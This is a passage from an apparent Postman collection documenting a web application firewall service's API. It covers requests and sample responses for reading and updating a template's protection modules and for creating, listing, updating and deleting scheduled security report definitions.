{{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id"],"variable":[{"key":"template_id","value":"{{template_id}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 21 Feb 2020 04:05:54 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"212"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5efc2c76-8cbf-4422-9257-d0b73a26c699"},{"key":"Access-Control-Allow-Origin","value":""},{"key":"x-amz-apigw-id","value":"IOqMrFDJyQ0FY_Q="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5e4f571d-d914e5c39bf59b0b51331135;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"template_id\": \"bd45f3d5-7388-5df8-a514-75c354e81b2b\",\n        \"name\": \"template-name\",\n        \"endpoints\": [\n            \"2700465310\"\n        ],\n        \"features\": [\n            \"RequestLimits\",\n            \"ddosprevention\",\n            \"knownattacks\"\n        ]\n    }\n}"}],"_postman_id":"6c6aeaef-5835-426d-ac1f-3444efda9d4f"},{"name":"Get Template Modules","id":"deb5df7f-f9a5-4c51-ac28-83200e5fdc49","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1//template/:template_id/modules","description":"<p>Get the all modues' status of the user's template.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","","template",":template_id","modules"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"type":"string","value":"{{template_id}}","key":"template_id"}]}},"response":[{"id":"4e203c77-15c1-45b0-922b-60912fca2ef0","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer2 {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1//template/:template_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","","template",":template_id","modules"],"variable":[{"key":"template_id","value":""}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:15:08 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"1df13266-8bf7-11e9-a369-c56c37d070a0"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"bGFtfElJSQ0FR5Q="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"bb85cdaa-e68a-4e9c-84c0-17d5123809df","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1//template/:template_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","","template",":template_id","modules"],"variable":[{"key":"template_id","value":""}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:14:14 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"1841"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"fd2a639c-8bf6-11e9-a3b7-c5c44c9c7e30"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGFk5GnHSQ0FhSQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff1c85-d216f23a0abc99241a42ee34;Sampled=0"}],"cookie":[],"responseTime":null,"body":"[\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n  }\n]"}],"_postman_id":"deb5df7f-f9a5-4c51-ac28-83200e5fdc49"},{"name":"Update Template Modules","id":"c08e9fe2-e8a0-4ee2-a574-270a3d08ee45","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":"[\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n  }\n]"},"url":"https://api.tim.waasonline.com/v1/template/:template_id/modules","description":"<p>Modify Modules configuration of the template.</p>\n<p>A sample body is added to the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-python\">[\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n  }\n]\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","template",":template_id","modules"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The template ID.</p>\n","type":"text/plain"},"type":"string","value":"{{template_id}}","key":"template_id"}]}},"response":[{"id":"8c2dfc83-5c08-4474-97d3-e20d15bc1c2c","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"[\n  {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"biometricsbaseddetection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RewritingRequests\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"botdeception\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n  },\n  {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n  },\n  {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n  }\n]"},"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id","modules"],"variable":[{"key":"template_id","value":""}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:35:33 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"56"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"f01a3e4b-8bf9-11e9-82e3-2bab70f3e16b"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bGIqyFGRyQ0FWEg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cff2178-4ea52ed8cd4b26a001376fc0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Module configuration changed successfully.\"\n}"},{"id":"de0a8b5a-8fa9-43b3-8ecf-e47912cb48b6","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"[{\n    \"id\": \"knownattacks\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"AnomalyDetection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"informationleakage\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"CookieSecurity\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"FileProtection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"httpheadersecurity\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"csrfprotection\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"mitbprotection\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"RequestLimits\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"urlaccess\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"IPProtection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"botdetection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"ddosprevention\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"customrule\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"WebSocketSecurity\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"APIProtection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"APIGateway\",\n    \"status\": \"enable\"\n}, {\n    \"id\": \"MobileAPIProtection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"JsonProtection\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"XMLProtectionPolicy\",\n    \"status\": \"disable\"\n}, {\n    \"id\": \"account_takeover\",\n    \"status\": \"disable\"\n}]"},"url":{"raw":"https://api.tim.waasonline.com/v1/template/:template_id/modules","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","template",":template_id","modules"],"variable":[{"key":"template_id","value":""}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 Jun 2019 03:37:05 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"32"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"2edd2386-8bfa-11e9-bee8-41af2caca11e"},{"key":"x-amz-apigw-id","value":"bGI7PGgqyQ0FrIQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Ilegal request parameter: missed modules ids: {'RewritingRequests'}\"\n}"}],"_postman_id":"c08e9fe2-e8a0-4ee2-a574-270a3d08ee45"}],"id":"a962ac7f-0ca8-40c1-8a2b-ff30a7c8df0c","description":"<p>Configure to use the WAF configuration template to push WAF configurations to multiple applications.</p>\n","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"ce79df0b-218a-4f74-b10d-80cefb64f2d6"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"599ec25f-6ad1-4043-b55f-af64f69d48d4"}}],"_postman_id":"a962ac7f-0ca8-40c1-8a2b-ff30a7c8df0c"},{"name":"Reports","item":[{"name":"Get Report Definitions List","id":"cd96dc0a-7371-40dd-bfe1-5d2b33b675d9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/security_reports?cursor={{cursor}}&filter={{filter}}&forward={{forward}}&size={{size}}","description":"<p>Get weekly report list.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>To list the items of the first page, leave the cursor value empty.</p>\n<p>To go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.</p>\n<p>To go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.</p>\n","type":"text/plain"},"key":"cursor","value":"{{cursor}}"},{"description":{"content":"<p>You can filter by report_name and recipients.</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"},{"description":{"content":"<p>True: the next page;</p>\n<p>False: the previous page.</p>\n","type":"text/plain"},"key":"forward","value":"{{forward}}"},{"description":{"content":"<p>The valid time range is 10-50.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"}],"variable":[]}},"response":[{"id":"c6962cc7-92b7-45da-a03d-2efbbcb77d75","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/security_reports?cursor=eyJyZXBvcnRfaWQiOiB7IlMiOiAiNWYwNzc0ZDYtYjhlZi0xMWVhLWI0OTYtNWFkODk4YjEzNDBmIn0sICJvd25lcl9pZCI6IHsiUyI6ICI5MDYyMDMifX0=&filter=%5B%7B%22id%22:%22recipients%22,%22logic%22:%7B%22is%22:%7B%22string%22:true%7D,%22search%22:%22string%22%7D,%22value%22:%5B%22163%22%5D%7D%5D&forward=true&size=10","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","security_reports"],"query":[{"key":"cursor","value":"eyJyZXBvcnRfaWQiOiB7IlMiOiAiNWYwNzc0ZDYtYjhlZi0xMWVhLWI0OTYtNWFkODk4YjEzNDBmIn0sICJvd25lcl9pZCI6IHsiUyI6ICI5MDYyMDMifX0="},{"key":"filter","value":"%5B%7B%22id%22:%22recipients%22,%22logic%22:%7B%22is%22:%7B%22string%22:true%7D,%22search%22:%22string%22%7D,%22value%22:%5B%22163%22%5D%7D%5D"},{"key":"forward","value":"true"},{"key":"size","value":"10"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"data\": [\n        {\n            \"report_id\": \"5f0774d6-b8ef-11ea-b496-5ad898b1340f\",\n            \"report_name\": \"Demo_Report_1\",\n            \"time_range\": \"24h\",\n            \"recipients\": \"testuser8@aaa.com\",\n            \"custom_recipient\": false,\n            \"applications\": [\n                \"2277317806\"\n            ],\n            \"contents\": [\n                \"src_ip\",\n                \"srccountry\"\n            ],\n            \"schedule_str\": \"Manually\",\n            \"schedule_info\": {\n                \"timezone\": 480,\n                \"repeat\": \"manually\"\n            },\n            \"last_run_time\": \"--\",\n            \"next_run_time\": \"--\"\n        },\n        {\n            \"report_id\": \"6a1ce2b2-b8fd-11ea-954f-d63461e01797\",\n            \"report_name\": \"china\",\n            \"time_range\": \"24h\",\n            \"recipients\": \"testuser1@aaa.com\",\n            \"custom_recipient\": false,\n            \"applications\": [\n                \"7263170513\"\n            ],\n            \"contents\": [\n                \"main_type\"\n            ],\n            \"schedule_str\": \"At 17:00 on Wednesday of Every Week\",\n            \"schedule_info\": {\n                \"time\": \"17:0\",\n                \"day\": 3,\n                \"timezone\": 480,\n                \"repeat\": \"weekly\"\n            },\n            \"last_run_time\": \"--\",\n            \"next_run_time\": \"2020-07-01 17:00\"\n        },\n        {\n            \"report_id\": \"ae5d7ece-b906-11ea-97b8-baa3eebb43cc\",\n            \"report_name\": \"dwguo\",\n            \"time_range\": \"30d\",\n            \"recipients\": \"testuser0@aaa.com\",\n            \"custom_recipient\": false,\n            \"applications\": [\n                \"4533058409\"\n            ],\n            \"contents\": [\n                \"main_type\",\n                \"signature_id\",\n                \"src_ip\",\n                \"srccountry\",\n                \"http_url\",\n                \"signature_cve_id\",\n                \"owasp_top10\"\n            ],\n            \"schedule_str\": \"At 00:00 on Monday of Every Week\",\n            \"schedule_info\": {\n                \"time\": \"0:0\",\n                \"day\": 1,\n                \"timezone\": 480,\n                \"repeat\": \"weekly\"\n            },\n            \"last_run_time\": \"2020-06-28 16:49\",\n            \"next_run_time\": \"2020-06-29 00:00\"\n        },\n        {\n            \"report_id\": \"dfcd526e-b8fb-11ea-ab04-bac5fd66684d\",\n            \"report_name\": \"fsun\",\n            \"time_range\": \"24h\",\n            \"recipients\": \"demos@example.com\",\n            \"custom_recipient\": true,\n            \"applications\": [\n                \"7263170513\"\n            ],\n            \"contents\": [\n                \"srccountry\",\n                \"http_url\"\n            ],\n            \"schedule_str\": \"At 15:40 on Every Day\",\n            \"schedule_info\": {\n                \"timezone\": 480,\n                \"repeat\": \"daily\",\n                \"time\": \"15:40\"\n            },\n            \"last_run_time\": \"2020-06-28 15:40\",\n            \"next_run_time\": \"2020-06-28 15:40\"\n        }\n    ],\n    \"total\": 4,\n    \"user_perm\": \"rw\",\n    \"next_cursor\": null,\n    \"prev_cursor\": \"eyJyZXBvcnRfaWQiOiB7IlMiOiAiNWYwNzc0ZDYtYjhlZi0xMWVhLWI0OTYtNWFkODk4YjEzNDBmIn0sICJvd25lcl9pZCI6IHsiUyI6ICI5MDYyMDMifX0=\"\n}"}],"_postman_id":"cd96dc0a-7371-40dd-bfe1-5d2b33b675d9"},{"name":"Create Report Definition","id":"ce4017a1-850d-4f70-a7a8-4c763be2b4d5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"body":{"mode":"raw","raw":"{\n\t\"report_name\": \"{{report_name}}\"\n}"},"url":"https://api.tim.waasonline.com/v1/security_reports","description":"<p>Create a report definition.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"bc0d12b8-3923-4e74-a109-f6898648543e","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"report_name\": \"test_create\",\n\t\"time_range\": \"24h\",\n\t\"contents\": [\n\t\t\"signature_cve_id\",\n\t\t\"owasp_top10\"\n\t],\n\t\"applications\": [\n\t\t\"3695185762\"\n\t],\n\t\"schedule_info\": {\n\t\t\"repeat\": \"daily\",\n\t\t\"time\": \"20:0\",\n\t\t\"timezone\": 480\n\t},\n\t\"custom_recipient\": true,\n\t\"recipients\": \"fsun@example.com\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/security_reports"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The operation was successful.\"\n}"}],"_postman_id":"ce4017a1-850d-4f70-a7a8-4c763be2b4d5"},{"name":"Update Report Definition","id":"4156a6f6-e89c-411c-bfe8-8ca732e24a7b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"body":{"mode":"raw","raw":"{\n\t\"report_name\": \"{{report_name}}\"\n}"},"url":"https://api.tim.waasonline.com/v1/security_reports","description":"<p>Update a report definition.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"d01f4c9f-7de0-4f86-b0ad-04d59d74a00b","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}","warning":"This is a duplicate header and will be overridden by the Authorization header generated by Postman."}],"body":{"mode":"raw","raw":"{\n\t\"report_id\": \"ae5d7ece-b906-11ea-97b8-baa3eebb43cc\",\n\t\"report_name\": \"test_update\",\n\t\"time_range\": \"7d\",\n\t\"contents\": [\n\t\t\"signature_id\",\n\t\t\"http_url\"\n\t],\n\t\"applications\": [\n\t\t\"3695185762\", \"2353012721\"\n\t],\n\t\"schedule_info\": {\n\t\t\"repeat\": \"weekly\",\n\t\t\"time\": \"18:0\",\n\t\t\"day\": \"5\",\n\t\t\"timezone\": -480\n\t},\n\t\"custom_recipient\": true,\n\t\"recipients\": \"abc@example.com\"\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/security_reports"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The operation was successful.\"\n}"}],"_postman_id":"4156a6f6-e89c-411c-bfe8-8ca732e24a7b"},{"name":"Delete Report Definition","id":"d4a0f417-0ae4-4d11-bfe7-2ccf17bc2d6b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/security_reports?report_id={{report_id}}","description":"<p>Delete weekly report definition.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The report ID</p>\n","type":"text/plain"},"key":"report_id","value":"{{report_id}}"}],"variable":[]}},"response":[{"id":"741dd7ec-d0ad-4afa-8686-81153d676341","name":"Success","originalRequest":{"method":"DELETE","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/security_reports?report_id=ae5d7ece-b906-11ea-97b8-baa3eebb43cc","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","security_reports"],"query":[{"key":"report_id","value":"ae5d7ece-b906-11ea-97b8-baa3eebb43cc","description":"The report ID"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"The operation was successful.\"\n}"}],"_postman_id":"d4a0f417-0ae4-4d11-bfe7-2ccf17bc2d6b"},{"name":"Get Report Definition Detail","id":"d848326b-1365-4a8d-a4c8-01ce36f98f01","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/security_reports/{{report_id}}","description":"<p>Get weekly report list.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","security_reports","{{report_id}}"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"901f12ec-21bc-4f48-8cb9-8ebfed398cf8","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Token","type":"text"}],"url":"https://api.tim.waasonline.com/v1/security_reports/5f0774d6-b8ef-11ea-b496-5ad898b1340f"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"report_id\": \"5f0774d6-b8ef-11ea-b496-5ad898b1340f\",\n    \"report_name\": \"Demo_Report_1\",\n    \"time_range\": \"24h\",\n    \"recipients\": \"testuser@aaa.com\",\n    \"custom_recipient\": false,\n    \"applications\": [\n        \"2277317806\"\n    ],\n    \"contents\": [\n        \"src_ip\",\n        \"srccountry\"\n    ],\n    \"schedule_str\": \"Manually\",\n    